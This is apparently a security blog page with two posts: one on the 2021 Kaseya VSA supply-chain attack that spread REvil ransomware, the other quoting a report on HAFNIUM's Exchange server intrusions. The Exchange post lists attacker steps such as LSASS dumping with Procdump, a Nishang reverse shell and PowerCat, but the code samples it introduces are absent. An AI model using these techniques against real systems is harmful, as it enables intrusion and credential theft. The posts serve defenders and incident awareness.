Breach

Hello All. If you haven’t yet heard the news about this, you probably will eventually. This vulnerability made the news over the long weekend. I thought I would provide a bit of an update. This is another supply chain attack, and is similar in its basic methodology to last year’s SolarWinds attack, with malware installed via an update server.

The Virtual System/Server Administrator (VSA), is software used by Kaseya customers to monitor and manage their infrastructure. It is supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers. These SaaS VSA servers can be deployed by end-users or by MSPs. Kaseya sends out updates to these VSA servers and, on Friday July 2, an update was distributed that contained REvil ransomware code. It affected fewer than 40 Kaseya VSA customers — but around 30 of them were MSPs, and the code was then sent on to their customers. Potentially thousands of MSP client businesses were infected.

Here is VSA:

Kaseya has released a “Compromise Detection Tool” to detect if an installation has been compromised.  All on-premises VSA Servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase security posture.

Here is a listing of various sites that have posted IOCs and/or TTPs:

  • Trend Micro – https://success.trendmicro.com/solution/000286890
  • McAfee – https://kc.mcafee.com/corporate/index?page=content&id=KB94660&locale=en_US
  • Cisco Talos – https://blog.talosintelligence.com/2021/07/revil-ransomware-actors-attack-kaseya.html
  • Huntress – https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
  • Splunk – splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html
Read more

Hello All. I wanted to pass on these pretty good technical details on the vulnerabilities affecting Microsoft Exchange on-premise:

After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:

Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:

  • Using Procdump to dump the LSASS process memory:

  • Using 7-Zip to compress stolen data into ZIP files for exfiltration:

  • Adding and using Exchange PowerShell snap-ins to export mailbox data:

  • Using the Nishang Invoke-PowerShellTcpOneLine reverse shell:

  • Downloading PowerCat from GitHub, then using it to open a connection to a remote server:

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.

Our blog, Defending Exchange servers under attack, offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog Web shell attacks continue to rise.

Read more